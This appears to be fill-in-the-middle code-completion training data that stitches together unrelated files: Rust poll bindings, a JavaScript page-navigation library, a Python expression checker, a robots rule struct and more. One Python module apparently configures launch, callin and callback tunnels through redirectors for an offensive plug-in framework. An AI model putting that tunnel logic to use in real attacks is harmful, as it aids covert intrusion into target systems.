/// [ioctl_tty(2)](http://man7.org/linux/man-pages/man2/ioctl_tty.2.html)).
/// * A cgroup.events file has been modified (see
/// [cgroups(7)](http://man7.org/linux/man-pages/man7/cgroups.7.html)).
POLLPRI;
/// Writing is now possible, though a write larger that the
/// available space in a socket or pipe will still block (unless
/// `O_NONBLOCK` is set).
POLLOUT;
/// Equivalent to [`POLLIN`](constant.POLLIN.html)
POLLRDNORM;
/// Equivalent to [`POLLOUT`](constant.POLLOUT.html)
POLLWRNORM;
/// Priority band data can be read (generally unused on Linux).
POLLRDBAND;
/// Priority data may be written.
POLLWRBAND;
/// Error condition (only returned in
/// [`PollFd::revents`](struct.PollFd.html#method.revents);
/// ignored in [`PollFd::new`](struct.PollFd.html#method.new)).
/// This bit is also set for a file descriptor referring to the
/// write end of a pipe when the read end has been closed.
POLLERR;
/// Hang up (only returned in [`PollFd::revents`](struct.PollFd.html#method.revents);
/// ignored in [`PollFd::new`](struct.PollFd.html#method.new)).
/// Note that when reading from a channel such as a pipe or a stream
/// socket, this event merely indicates that the peer closed its
/// end of the channel. Subsequent reads from the channel will
/// return 0 (end of file) only after all outstanding data in the
/// channel has been consumed.
POLLHUP;
/// Invalid request: `fd` not open (only returned in
/// [`PollFd::revents`](struct.PollFd.html#method.revents);
/// ignored in [`PollFd::new`](struct.PollFd.html#method.new)).
POLLNVAL;
}
}
/// `poll` waits for one of a set of file descriptors to become ready to perform I/O.
/// ([`poll(2)`](http://pubs.opengroup.org/onlinepubs/9699919799/functions/poll.html))
///
/// `fds` contains all [`PollFd`](struct.PollFd.html) to poll.
/// The function will return as soon as any event occur for any of these `PollFd`s.
///
/// The `timeout` argument specifies the number of milliseconds that `poll()`
/// should block waiting for a file descriptor to become ready. The call
/// will block until either:
///
/// * a file descriptor becomes ready;
/// * the call is interrupted by a signal handler; or
/// * the timeout expires.
///
/// Note that the timeout interval will be rounded up to the system clock
/// granularity, and kernel scheduling delays mean that the blocking
/// interval may overrun by a small amount. Specifying a negative value
/// in timeout means an infinite timeout. Specifying a timeout of zero
/// causes `poll()` to return immediately, even if no file descriptors are
/// ready.
pub fn poll(fds: &mut [PollFd], timeout: libc::c_int) -> Result<libc::c_int> {
let res = unsafe {
libc::poll(fds.as_mut_ptr() as *mut libc::pollfd,
fds.len() as libc::nfds_t,
timeout)
};
Errno::result(res)
}
/// `ppoll()` allows an application to safely wait until either a file
/// descriptor becomes ready or until a signal is caught.
/// ([`poll(2)`](http://man7.org/linux/man-pages/man2/poll.2.html))
///
/// `ppoll` behaves like `poll`, but let you specify what signals may interrupt it
/// with the `sigmask` argument.
///
#[cfg(any(target_os = "android", target_os = "dragonfly", target_os = "freebsd", target_os = "linux"))]
pub fn ppoll(fds: &mut [PollFd], timeout: TimeSpec, sigmask: SigSet) -> Result<libc::c_int> {
let res = unsafe {
libc::ppoll(fds.as_mut_ptr() as *mut libc::pollfd,
fds.len() as libc::nfds_t,
timeout.as_ref(),
sigmask.as_ref())
};
Errno::result(res)
}<|fim▁end|>
|
pub struct EventFlags: libc::c_short {
/// There is data to read.
|
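// A hedged usage sketch for `poll` (kept in comments because the crate paths
// are assumptions): it supposes this module is reachable as `nix::poll`,
// that the generated flags are associated constants on `EventFlags`, and it
// picks fd 0 (stdin) with a one-second timeout as illustrative choices.
//
//     use nix::poll::{poll, EventFlags, PollFd};
//
//     let mut fds = [PollFd::new(0, EventFlags::POLLIN)];
//     match poll(&mut fds, 1000).expect("poll failed") {
//         0 => println!("timed out"),
//         _ => println!("revents: {:?}", fds[0].revents()),
//     }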
<|file_name|>push.js<|end_file_name|><|fim▁begin|>/* ----------------------------------
* PUSH v2.0.0
* Licensed under The MIT License
* inspired by chris's jquery.pjax.js
* http://opensource.org/licenses/MIT
* ---------------------------------- */
!function () {
var noop = function () {};
  // Pushstate caching
  // =================
var isScrolling;
var maxCacheLength = 20;
var cacheMapping = sessionStorage;
var domCache = {};
var transitionMap = {
'slide-in' : 'slide-out',
'slide-out' : 'slide-in',
'fade' : 'fade'
};
var bars = {
bartab : '.bar-tab',
barnav : '.bar-nav',
barfooter : '.bar-footer',
barheadersecondary : '.bar-header-secondary'
};
var cacheReplace = function (data, updates) {
PUSH.id = data.id;
if (updates) data = getCached(data.id);
cacheMapping[data.id] = JSON.stringify(data);
window.history.replaceState(data.id, data.title, data.url);
domCache[data.id] = document.body.cloneNode(true);
};
var cachePush = function () {
var id = PUSH.id;
var cacheForwardStack = JSON.parse(cacheMapping.cacheForwardStack || '[]');
var cacheBackStack = JSON.parse(cacheMapping.cacheBackStack || '[]');
cacheBackStack.push(id);
while (cacheForwardStack.length) delete cacheMapping[cacheForwardStack.shift()];
while (cacheBackStack.length > maxCacheLength) delete cacheMapping[cacheBackStack.shift()];
window.history.pushState(null, '', cacheMapping[PUSH.id].url);
cacheMapping.cacheForwardStack = JSON.stringify(cacheForwardStack);
cacheMapping.cacheBackStack = JSON.stringify(cacheBackStack);
};
var cachePop = function (id, direction) {
var forward = direction == 'forward';
var cacheForwardStack = JSON.parse(cacheMapping.cacheForwardStack || '[]');
var cacheBackStack = JSON.parse(cacheMapping.cacheBackStack || '[]');
var pushStack = forward ? cacheBackStack : cacheForwardStack;
var popStack = forward ? cacheForwardStack : cacheBackStack;
if (PUSH.id) pushStack.push(PUSH.id);
popStack.pop();
cacheMapping.cacheForwardStack = JSON.stringify(cacheForwardStack);
cacheMapping.cacheBackStack = JSON.stringify(cacheBackStack);
};
var getCached = function (id) {
return JSON.parse(cacheMapping[id] || null) || {};
};
var getTarget = function (e) {
var target = findTarget(e.target);
<|fim▁hole|> || e.metaKey
|| e.ctrlKey
|| isScrolling
|| location.protocol !== target.protocol
|| location.host !== target.host
|| !target.hash && /#/.test(target.href)
|| target.hash && target.href.replace(target.hash, '') === location.href.replace(location.hash, '')
|| target.getAttribute('data-ignore') == 'push'
) return;
return target;
};
// Main event handlers (touchend, popstate)
// ==========================================
var touchend = function (e) {
var target = getTarget(e);
if (!target) return;
e.preventDefault();
PUSH({
url : target.href,
hash : target.hash,
timeout : target.getAttribute('data-timeout'),
transition : target.getAttribute('data-transition')
});
};
var popstate = function (e) {
var key;
var barElement;
var activeObj;
var activeDom;
var direction;
var transition;
var transitionFrom;
var transitionFromObj;
var id = e.state;
if (!id || !cacheMapping[id]) return;
direction = PUSH.id < id ? 'forward' : 'back';
cachePop(id, direction);
activeObj = getCached(id);
activeDom = domCache[id];
if (activeObj.title) document.title = activeObj.title;
if (direction == 'back') {
transitionFrom = JSON.parse(direction == 'back' ? cacheMapping.cacheForwardStack : cacheMapping.cacheBackStack);
transitionFromObj = getCached(transitionFrom[transitionFrom.length - 1]);
} else {
transitionFromObj = activeObj;
}
if (direction == 'back' && !transitionFromObj.id) return PUSH.id = id;
transition = direction == 'back' ? transitionMap[transitionFromObj.transition] : transitionFromObj.transition;
if (!activeDom) {
return PUSH({
id : activeObj.id,
url : activeObj.url,
title : activeObj.title,
timeout : activeObj.timeout,
transition : transition,
ignorePush : true
});
}
if (transitionFromObj.transition) {
activeObj = extendWithDom(activeObj, '.content', activeDom.cloneNode(true));
for (key in bars) {
barElement = document.querySelector(bars[key])
if (activeObj[key]) swapContent(activeObj[key], barElement);
else if (barElement) barElement.parentNode.removeChild(barElement);
}
}
swapContent(
(activeObj.contents || activeDom).cloneNode(true),
document.querySelector('.content'),
transition
);
PUSH.id = id;
document.body.offsetHeight; // force reflow to prevent scroll
};
// Core PUSH functionality
// =======================
var PUSH = function (options) {
var key;
var data = {};
var xhr = PUSH.xhr;
options.container = options.container || options.transition ? document.querySelector('.content') : document.body;
for (key in bars) {
options[key] = options[key] || document.querySelector(bars[key]);
}
if (xhr && xhr.readyState < 4) {
xhr.onreadystatechange = noop;
xhr.abort()
}
xhr = new XMLHttpRequest();
xhr.open('GET', options.url, true);
xhr.setRequestHeader('X-PUSH', 'true');
xhr.onreadystatechange = function () {
if (options._timeout) clearTimeout(options._timeout);
if (xhr.readyState == 4) xhr.status == 200 ? success(xhr, options) : failure(options.url);
};
if (!PUSH.id) {
cacheReplace({
id : +new Date,
url : window.location.href,
title : document.title,
timeout : options.timeout,
transition : null
});
}
if (options.timeout) {
options._timeout = setTimeout(function () { xhr.abort('timeout'); }, options.timeout);
}
xhr.send();
if (xhr.readyState && !options.ignorePush) cachePush();
};
// Main XHR handlers
// =================
var success = function (xhr, options) {
var key;
var barElement;
var data = parseXHR(xhr, options);
if (!data.contents) return locationReplace(options.url);
if (data.title) document.title = data.title;
if (options.transition) {
for (key in bars) {
barElement = document.querySelector(bars[key])
if (data[key]) swapContent(data[key], barElement);
else if (barElement) barElement.parentNode.removeChild(barElement);
}
}
swapContent(data.contents, options.container, options.transition, function () {
cacheReplace({
id : options.id || +new Date,
url : data.url,
title : data.title,
timeout : options.timeout,
transition : options.transition
}, options.id);
triggerStateChange();
});
if (!options.ignorePush && window._gaq) _gaq.push(['_trackPageview']) // google analytics
if (!options.hash) return;
};
var failure = function (url) {
throw new Error('Could not get: ' + url)
};
// PUSH helpers
// ============
var swapContent = function (swap, container, transition, complete) {
var enter;
var containerDirection;
var swapDirection;
if (!transition) {
if (container) container.innerHTML = swap.innerHTML;
else if (swap.classList.contains('content')) document.body.appendChild(swap);
else document.body.insertBefore(swap, document.querySelector('.content'));
} else {
enter = /in$/.test(transition);
if (transition == 'fade') {
container.classList.add('in');
container.classList.add('fade');
swap.classList.add('fade');
}
if (/slide/.test(transition)) {
swap.classList.add('sliding-in', enter ? 'right' : 'left');
swap.classList.add('sliding');
container.classList.add('sliding');
}
container.parentNode.insertBefore(swap, container);
}
if (!transition) complete && complete();
if (transition == 'fade') {
container.offsetWidth; // force reflow
container.classList.remove('in');
container.addEventListener('webkitTransitionEnd', fadeContainerEnd);
function fadeContainerEnd() {
container.removeEventListener('webkitTransitionEnd', fadeContainerEnd);
swap.classList.add('in');
swap.addEventListener('webkitTransitionEnd', fadeSwapEnd);
}
function fadeSwapEnd () {
swap.removeEventListener('webkitTransitionEnd', fadeSwapEnd);
container.parentNode.removeChild(container);
swap.classList.remove('fade');
swap.classList.remove('in');
complete && complete();
}
}
if (/slide/.test(transition)) {
container.offsetWidth; // force reflow
    swapDirection = enter ? 'right' : 'left';
    containerDirection = enter ? 'left' : 'right';
container.classList.add(containerDirection);
swap.classList.remove(swapDirection);
swap.addEventListener('webkitTransitionEnd', slideEnd);
function slideEnd() {
swap.removeEventListener('webkitTransitionEnd', slideEnd);
swap.classList.remove('sliding', 'sliding-in');
swap.classList.remove(swapDirection);
container.parentNode.removeChild(container);
complete && complete();
}
}
};
var triggerStateChange = function () {
var e = new CustomEvent('push', {
detail: { state: getCached(PUSH.id) },
bubbles: true,
cancelable: true
});
window.dispatchEvent(e);
};
var findTarget = function (target) {
var i, toggles = document.querySelectorAll('a');
for (; target && target !== document; target = target.parentNode) {
for (i = toggles.length; i--;) { if (toggles[i] === target) return target; }
}
};
var locationReplace = function (url) {
window.history.replaceState(null, '', '#');
window.location.replace(url);
};
var parseURL = function (url) {
var a = document.createElement('a'); a.href = url; return a;
};
var extendWithDom = function (obj, fragment, dom) {
var i;
var result = {};
for (i in obj) result[i] = obj[i];
Object.keys(bars).forEach(function (key) {
var el = dom.querySelector(bars[key]);
if (el) el.parentNode.removeChild(el);
result[key] = el;
});
result.contents = dom.querySelector(fragment);
return result;
};
var parseXHR = function (xhr, options) {
var head;
var body;
var data = {};
var responseText = xhr.responseText;
data.url = options.url;
if (!responseText) return data;
if (/<html/i.test(responseText)) {
head = document.createElement('div');
body = document.createElement('div');
    head.innerHTML = responseText.match(/<head[^>]*>([\s\S]*)<\/head>/i)[0];
    body.innerHTML = responseText.match(/<body[^>]*>([\s\S]*)<\/body>/i)[0];
} else {
head = body = document.createElement('div');
head.innerHTML = responseText;
}
data.title = head.querySelector('title');
data.title = data.title && data.title.innerText.trim();
if (options.transition) data = extendWithDom(data, '.content', body);
else data.contents = body;
return data;
};
// Attach PUSH event handlers
// ==========================
window.addEventListener('touchstart', function () { isScrolling = false; });
window.addEventListener('touchmove', function () { isScrolling = true; });
window.addEventListener('touchend', touchend);
window.addEventListener('click', function (e) { if (getTarget(e)) e.preventDefault(); });
window.addEventListener('popstate', popstate);
window.PUSH = PUSH;
}();<|fim▁end|>
|
if (
! target
|| e.which > 1
|
<|file_name|>liveness-swap-uninit.rs<|end_file_name|><|fim▁begin|>// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your<|fim▁hole|>fn main() {
let mut x = 3;
let y;
x <-> y; //~ ERROR use of possibly uninitialized variable: `y`
copy x;
}<|fim▁end|>
|
// option. This file may not be copied, modified, or distributed
// except according to those terms.
|
<|file_name|>redirection.py<|end_file_name|><|fim▁begin|>import string<|fim▁hole|>import uuid
import random
from util import iDict
import exception
# Nothing is validating the Redir section in the xml. I may get nonexistent
# params.
#
__all__ = ['RedirectionManager', 'LocalRedirection', 'RemoteRedirection']
def str2bool(x):
if x is None:
return False
if x.lower() in ('true', 't', '1'):
return True
else:
return False
def strip_xpath(x):
if not x:
return x
if x.startswith('/'):
return ""
else:
return x
def is_identifier(x):
if not x:
return False
else:
if x[0] in string.digits:
return False
else:
return True
def rand_port():
RAND_PORT_MIN = 1025
RAND_PORT_MAX = 65535
return str(random.randint(RAND_PORT_MIN, RAND_PORT_MAX))
class LocalRedirection(object):
"""
listenaddr: Name of parameter to give the IP addr of listening tunnel on local LP
listenport: Name of parameter to give the port of the listening tunnel on local LP
destaddr: Name of parameter that contains the IP of the target computer
destport: Name of parameter that contains the port on the target computer
"""
def __init__(self, protocol, listenaddr, listenport, destaddr, destport,
closeoncompletion="false", name="", srcport=None, srcportlist=None,
srcportrange=None, *trashargs, **trashkargs):
self.protocol = protocol
# XXX - The redirection section really shouldn't have XPath in it.
self.listenaddr = strip_xpath(listenaddr)
self.listenport = strip_xpath(listenport)
self.destaddr = strip_xpath(destaddr)
self.destport = strip_xpath(destport)
self.closeoncompletion = str2bool(closeoncompletion)
self.name = name
self.srcport = strip_xpath(srcport)
self.srcportlist = srcportlist
self.srcportrange = srcportrange
def __repr__(self):
return str(self.__dict__)
class RemoteRedirection(object):
def __init__(self, protocol, listenaddr, destport, closeoncompletion="false",
name="", listenport=None, listenportlist=None,
listenportrange=None, listenportcount=None, destaddr="0.0.0.0",
*trashargs, **trashkargs):
self.protocol = protocol
self.listenaddr = strip_xpath(listenaddr)
self.listenport = strip_xpath(listenport)
self.destaddr = strip_xpath(destaddr)
self.destport = strip_xpath(destport)
self.closeoncompletion = str2bool(closeoncompletion)
self.name = name
# Need conversion?
self.listenportlist = listenportlist
self.listenportrange = listenportrange
self.listenportcount = listenportcount
def __repr__(self):
return str(self.__dict__)
class RedirectionManager:
"""This is something of a misnomer. This is really a redirection manager rather than
a redirection object. This is responsible for taking the defined tunnels in the
plug-in's XML and 'swapping out' the parameters as they pertain to redirection.
A sample redirection section appears as follows:
<redirection>
<!-- (1) The "throwing" tunnel -->
<local name="Launch"
protocol="TCP"
listenaddr="TargetIp" # IP of redirector
listenport="TargetPort" # Port of redirector
destaddr="TargetIp" # IP of target computer
destport="TargetPort" # Port of target computer
closeoncompletion="true"/>
<!-- (2) The "Callin" tunnel -->
<local name="Callin"
protocol="TCP"
listenaddr="TargetIp" # IP on redirector
listenport="CallinPort" # Port on redirector
destaddr="TargetIp" # IP of target callin
destport="ListenPort" # Port of target callin
closeoncompletion="false"/>
<!-- (3) The "callback" tunnel -->
<remote name="Callback"
protocol="TCP"
listenaddr="CallbackIp" # IP opened by egg (last redirector)
listenport="CallbackPort" # Port opened by egg (last redirector)
destport="CallbackLocalPort" # Port for throwing side to listen
closeoncompletion="false"/>
</redirection>
For the "throwing" (launch) tunnel, we:
1: Ask for/retrieve the "Destination IP" and "Destination Port", which default to
the "TargetIp" and "TargetPort" parameters
2: Ask for the "Listen IP" (listenaddr) and "Listen Port" (listenport)
and then swap them in "TargetIp" and "TargetPort"
3: After execution, restore the proper session parameters
* (listenaddr, listenport) = l(destaddr, destport)
For the "callin" tunnel, we:
1: Ask for/retrieve the "Destination IP" and Destination Port", which default to
the "TargetIp" and the "ListenPort" parameters
2: Ask for the "Listen IP" (listenaddr) and "Listen Port" (listenport) and
then swap them into "TargetIp" and "CallinPort" parameters
3: After execution, restore the proper session parameters
* (listenaddr, listenport) = l(destaddr, destport)
For the "callback" tunnel, we:
1: Ask for the Listen IP and Listen Port for which the payload will callback.
This is most likely the last hop redirector IP and a port on it
2: Ask for the Destination IP and Destination Port, which will likely be the
operator workstation. Store the Destination port as "CallbackLocalPort",
basically ignoring the DestinationIp
3: After execution, restore the proper session parameters
* (destaddr, destport) = l(listenaddr, listenport)
"""
def __init__(self, io):
self.io = io
self.active = False
# A place to store parameters for the session. We push the info, run the plug-in
# (with redirection), and then pop the info to restore it
self.session_cache = {}
def on(self):
self.active = True
def off(self):
self.active = False
def is_active(self):
return self.active
def get_status(self):
if self.active:
return "ON"
else:
return "OFF"
def get_session(self, id):
return self.session_cache.get(id)
def pre_exec(self, plugin):
if not plugin.canRedirect():
return 0
if self.is_active():
self.io.print_msg("Redirection ON")
return self.config_redirect(plugin, True)
else:
self.io.print_msg("Redirection OFF")
return self.config_redirect(plugin, False)
def post_exec(self, plugin, id):
if id == 0:
return
# if plugin doesn't do redir, return
try:
stored_session_data = self.session_cache.pop(id)
except KeyError:
return
# Restore the old information to the session
for key,val in stored_session_data['params'].items():
plugin.set(key, val)
def print_session(self, id):
try:
session = self.session_cache[id]
except KeyError:
return
self.io.print_global_redir(session)
"""
Pre plugin execution
"""
def conv_param(self, val, params, session_data={}):
"""Resolve a value from one of session, params, or the hard value"""
try:
# First try to find the session parameter
if val in session_data:
return session_data[val]
# Then try to find the context-specific parameter
if is_identifier(val):
return params[val]
except:
return None
        # If it is neither a session nor a context parameter, return the value as is
return val
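        # Illustrative resolution order (values are hypothetical): given
        # session_data={'TargetPort': '8080'} and params={'TargetIp': '10.0.0.5'},
        #   conv_param('TargetPort', params, session_data) -> '8080'      (session wins)
        #   conv_param('TargetIp', params, session_data)   -> '10.0.0.5'  (context param)
        #   conv_param('443', params, session_data)        -> '443'       (literal value)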
def prompt_redir_fake(self, msg, default):
done = None
while not done:
try:
line = self.io.prompt_user(msg, default)
except exception.PromptHelp, err:
self.io.print_warning('No help available')
except exception.PromptErr, err:
raise
except exception.CmdErr, err:
self.io.print_error(err.getErr())
if line:
return line
def prompt_redir(self, plugin, var, msg, default):
"""Prompt for a redirect value and set it in Truantchild"""
done = None
while not done:
try:
line = self.io.prompt_user(msg, default)
plugin.set(var, line)
done = plugin.hasValidValue(var)
except exception.PromptHelp, err:
self.io.print_warning('No help available')
except exception.PromptErr, err:
raise
except exception.CmdErr, err:
self.io.print_error(err.getErr())
return plugin.get(var)
def straight_remote(self, r, plugin):
params = iDict(plugin.getParameters())
lport = self.conv_param(r.listenport, params)
dport = self.conv_param(r.destport, params)
laddr = self.conv_param(r.listenaddr, params)
if None in (lport, dport, laddr):
return
# Do we need to choose a random local port?
# XXX - This won't happen unless lport is 0
if not lport or lport == "0":
lport = rand_port()
# Store off the old values so that we can restore them after the
# plug-in executes
cache = {r.listenaddr : plugin.get(r.listenaddr),
r.listenport : plugin.get(r.listenport),
r.destport : plugin.get(r.destport)}
self.io.print_success("Remote Tunnel - %s" % r.name)
try:
# Modify the plugin and report success
callbackip = self.prompt_redir(plugin, r.listenaddr, 'Listen IP', laddr)
callbackport = self.prompt_redir(plugin, r.listenport, 'Listen Port', lport)
plugin.set(r.destport, callbackport)
self.io.print_success("(%s) Remote %s:%s" % (r.protocol, callbackip, callbackport))
except exception.PromptErr:
self.io.print_error("Aborted by user")
for (var,val) in cache.items():
try:
plugin.set(var, val)
except:
self.io.print_error("Error setting '%s' - May be in an inconsistent state" % var)
raise
def straight_local(self, l, plugin):
"""Effectively just print the straight path to the target"""
params = iDict(plugin.getParameters())
laddr = self.conv_param(l.listenaddr, params)
lport = self.conv_param(l.listenport, params)
if not laddr or not lport:
return
# HACK HACK
# The logic here was previously wrong, which meant that people didn't have to be careful
# about their redirection sections. Until we get them fixed, we need a hack that will
# allow these invalid redirection sections if we try it the valid way and fail
enable_hack = False
try:
cache = {l.destaddr : plugin.get(l.destaddr),
l.destport : plugin.get(l.destport)}
laddr = self.conv_param(l.destaddr, params)
lport = self.conv_param(l.destport, params)
except exception.CmdErr:
enable_hack = True
cache = {l.destaddr : plugin.get(l.listenaddr),
l.destport : plugin.get(l.listenport)}
self.io.print_success("Local Tunnel - %s" % l.name)
try:
if not enable_hack:
targetip = self.prompt_redir(plugin, l.destaddr, 'Destination IP', laddr)
targetport = self.prompt_redir(plugin, l.destport, 'Destination Port', lport)
self.io.print_success("(%s) Local %s:%s" % (l.protocol, targetip, targetport))
else:
targetip = self.prompt_redir(plugin, l.listenaddr, 'Destination IP', laddr)
targetport = self.prompt_redir(plugin, l.listenport, 'Destination Port', lport)
self.io.print_success("(%s) Local %s:%s" % (l.protocol, targetip, targetport))
except exception.PromptErr:
self.io.print_error("Aborted by user")
for (var,val) in cache.items():
try:
plugin.set(var, val)
except:
self.io.print_error("Error setting '%s' - May be in an inconsistent state" % var)
raise
except Exception as e:
self.io.print_error("Error: {0}".format(str(type(e))))
def redirect_remote(self, r, plugin, session_data):
"""(destaddr, destport) = r-xform(listenaddr, listenport)
* Each of the identifiers above specifies a variable for the plug-in
(1) Prompt for Listen IP - Likely the ultimate redirector's IP
(2) Prompt for Listen Port - Likely the ultimate redirector's port
(3) Prompt for Destination - Likely 0.0.0.0
(4) Prompt for Destination Port - Likely a local port
Lookup the variables specified by listenaddr and listenport, transform them with
a given transform function, and substitute the resulting values into the
variables specified by destaddr and destport.
The plug-in will then have to open a port to listen on using the variables
specified by the destnation IP and destination port
"""
params = iDict(plugin.getParameters())
lport = self.conv_param(r.listenport, params, session_data['params'])
dport = self.conv_param(r.destport, params, session_data['params'])
laddr = self.conv_param(r.listenaddr, params, session_data['params'])
daddr = self.conv_param(r.destaddr, params, session_data['params'])
if None in (lport, dport, laddr, daddr):
for p,n in (laddr, r.listenaddr), (lport, r.listenport), (daddr, r.destaddr), (dport, r.destport):
                if p is None:
self.io.print_warning("Parameter %s referenced by tunnel %s not found. This tunnel will "
"be ignored" % (n, r.name))
return
if not lport or lport == "0":
lport = rand_port()
self.io.print_success("Remote Tunnel - %s" % r.name)
#
# Prompt the user for the listenaddr and listenport
#
callbackip = self.prompt_redir(plugin, r.listenaddr, 'Listen IP', laddr)
callbackport = self.prompt_redir(plugin, r.listenport, 'Listen Port', lport)
#
# Do the substitution
#
session_data['params'][r.listenaddr] = callbackip
session_data['params'][r.listenport] = callbackport
# Get the other end of the tunnel, where the connection will eventually be made.
# This will likely be, but does not have to be, the local workstation
callbacklocalip = self.prompt_redir_fake('Destination IP', daddr)
if not dport:
dport = callbackport
callbacklocalport = self.prompt_redir(plugin, r.destport, 'Destination Port', dport)
session_data['params'][r.destport] = callbacklocalport
session_data['remote'].append(RemoteRedirection(r.protocol,
callbackip,
callbacklocalport,
listenport=callbackport,
destaddr=callbacklocalip,
name=r.name))
self.io.print_success("(%s) Remote %s:%s -> %s:%s" %
(r.protocol, callbackip, callbackport,
callbacklocalip, callbacklocalport))
def redirect_local(self, l, plugin, session_data):
"""
targetip = Destination IP (on the target)
targetport = Destination Port (on the target)
redirip = IP of the LP
redirport = Port on the LP
"""
# listenaddr - name of variable containing the LP IP
# listenport - name of variable containing the LP Port
# destaddr - name of variable containing the Target IP
# destport - name of variable containing the Target Port
# targetip - IP of the target
# targetport - Port of the target
# redirip - IP of the LP
# redirport - Port of the LP
params = iDict(plugin.getParameters())
# Get the defaults for the user prompt
laddr = self.conv_param(l.listenaddr, params, session_data['params'])
lport = self.conv_param(l.listenport, params, session_data['params'])
daddr = self.conv_param(l.destaddr, params, session_data['params'])
dport = self.conv_param(l.destport, params, session_data['params'])
if None in (laddr, lport, daddr, dport):
for p,n in (laddr, l.listenaddr), (lport, l.listenport), (daddr, l.destaddr), (dport, l.destport):
                if p is None:
self.io.print_warning("Parameter %s referenced by tunnel %s not found. This tunnel will "
"be ignored" % (n, l.name))
return
self.io.print_success("Local Tunnel - %s" % l.name)
#
# Get the destination IP and port for the target
#
targetip = self.prompt_redir_fake('Destination IP', daddr)
targetport = self.prompt_redir_fake('Destination Port', dport)
#
# Get the redirection addresses
#
redirip = self.prompt_redir(plugin, l.listenaddr, 'Listen IP', '127.0.0.1')
if not dport:
dport = targetport
redirport = self.prompt_redir(plugin, l.listenport, 'Listen Port', lport)
#
#
#
session_data['params'][l.listenaddr] = targetip
session_data['params'][l.listenport] = targetport
#
# Record the redirection tunnel
#
session_data['local'].append(LocalRedirection(l.protocol, redirip,
redirport, targetip,
targetport, name=l.name))
self.io.print_success("(%s) Local %s:%s -> %s:%s" %
(l.protocol, redirip, redirport, targetip, targetport))
def config_redirect(self, plugin, do_redir):
"""Configure whether the plug-in should perform redirection
plugin - An instance of a plugin
do_redir - Should we do redirection? (True or False)"""
redir = plugin.getRedirection()
# Make a new session dictionary here
session_data = {
'params' : {}, #
'remote' : [], #
'local' : [] #
}
if do_redir:
id = uuid.uuid4()
else:
id = 0
try:
self.io.newline()
self.io.print_success("Configure Plugin Local Tunnels")
for l in redir['local']:
if do_redir:
self.redirect_local(l, plugin, session_data)
else:
self.straight_local(l, plugin)
self.io.newline()
self.io.print_success("Configure Plugin Remote Tunnels")
for r in redir['remote']:
if do_redir:
self.redirect_remote(r, plugin, session_data)
else:
self.straight_remote(r, plugin)
except exception.PromptErr:
for key,val in session_data['params'].items():
plugin.set(key, val)
raise
self.io.newline()
# Store info into the cache so that we can restore it in post_exec
if id:
self.session_cache[id] = session_data
return id<|fim▁end|>
| |
<|file_name|>rule.rs<|end_file_name|><|fim▁begin|>use crate::model::path::Path;
use crate::model::path_pattern::PathPattern;
/// A rule line is a single "Allow:" (allowance == true) or "Disallow:"
/// (allowance == false) followed by a path.
#[derive(Debug, Clone)]
pub struct Rule {
path_pattern: PathPattern,
allowance: bool,
}
impl Rule {
pub fn new(path_pattern: impl Into<PathPattern>, allowance: bool) -> Rule {
Rule {
path_pattern: path_pattern.into(),
allowance,
}
}
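    // Illustrative usage (assumes some From<&str> impl backs the
    // `impl Into<PathPattern>` bound; the pattern string is hypothetical):
    //   let rule = Rule::new("/private/", false); // models "Disallow: /private/"
    //   assert!(!rule.get_allowance());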
pub(crate) fn applies_to(&self, path: &Path) -> bool {
self.path_pattern.applies_to(path)
}
pub(crate) fn get_allowance(&self) -> bool {
self.allowance
}
pub(crate) fn get_path_pattern(&self) -> &PathPattern {
&self.path_pattern<|fim▁hole|><|fim▁end|>
|
}
}
|
<|file_name|>parseTest.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
import re
userInput = raw_input("input equation\n")
numCount = 0
operandCount = 0
entryBracketCount = 0
exitBracketCount = 0
charCount = 0
endOfLine = len(userInput) - 1
for i in range(len(userInput)):
if (re.search('[\s*a-z\s*A-Z]+', userInput[i])):
charCount = charCount + 1
print operandCount, " 1"
elif (re.search('[\s*0-9]+', userInput[i])):
numCount = numCount + 1
print operandCount, " 2"
elif (re.search('[\*]', userInput[i])):
print 'TRUE'
# operandCount = operandCount + 1
# print operandCount, " 3.5"
# elif (re.search('[\s*\+|\s*\-|\s*\/]+', userInput[i])):
    elif (re.search('[-+*/]+', userInput[i])):  # '-' placed first so it is not treated as a range
operandCount = operandCount + 1
print operandCount, " 3"
# if(re.search('[\s*\+|\s*\-|\s*\/]+', userInput[endOfLine])):
        if(re.search('[-+*/]+', userInput[endOfLine])):
print "invalid expression"
print "1"
exit(0)
else:
if((re.search('[\s*a-zA-Z]+', userInput[i - 1])) or (re.search('[\s*\d]+', userInput[i - 1]))):
continue
else:
print 'invalid expression'
print '2'
exit(0)
if(re.search('[\s*\d]+', userInput[i - 1])):
continue
else:
print 'invalid expression'
print '3'
exit(0)<|fim▁hole|> continue
elif (re.search('[\(]+', userInput[i + 1])):
continue
elif (re.search('[\)]+', userInput[i + 1])):
continue
else:
print 'invalid expression'
print '4'
exit(0)
elif (re.search('[\(]+', userInput[i])):
entryBracketCount = entryBracketCount + 1
print operandCount, " 4"
elif (re.search('[\)]+', userInput[i])):
exitBracketCount = exitBracketCount + 1
print operandCount, " 5"
if(re.search('[\)]+', userInput[endOfLine])):
continue
else:
if(re.search('[\(]+', userInput[i + 1])):
print 'invalid expression'
print '5'
exit(0)
print operandCount, " 6"
if (entryBracketCount != exitBracketCount):
print "invalid expression"
print '6'
exit(0)
elif operandCount == 0:
print operandCount
print "invalid expression"
print '7'
exit(0)
elif ((numCount == 0) and (charCount == 0)):
print "invalid expression"
print '8'
exit(0)
else:
print "valid expression"<|fim▁end|>
|
if(re.search('[\s*a-zA-Z]+', userInput[i + 1])):
continue
elif(re.search('[\s*\d]+', userInput[i + 1])):
|
<|file_name|>cninetyninehexfloatf.rs<|end_file_name|><|fim▁begin|>//! formatter for %a %F C99 Hex-floating-point subs
use super::super::format_field::FormatField;
use super::super::formatter::{InPrefix, FormatPrimitive, Formatter};
use super::float_common::{FloatAnalysis, primitive_to_str_common};
use super::base_conv;
use super::base_conv::RadixDef;
pub struct CninetyNineHexFloatf {
as_num: f64,
}
impl CninetyNineHexFloatf {
pub fn new() -> CninetyNineHexFloatf {
CninetyNineHexFloatf { as_num: 0.0 }
}
}
impl Formatter for CninetyNineHexFloatf {
fn get_primitive(&self,
field: &FormatField,
inprefix: &InPrefix,
str_in: &str)
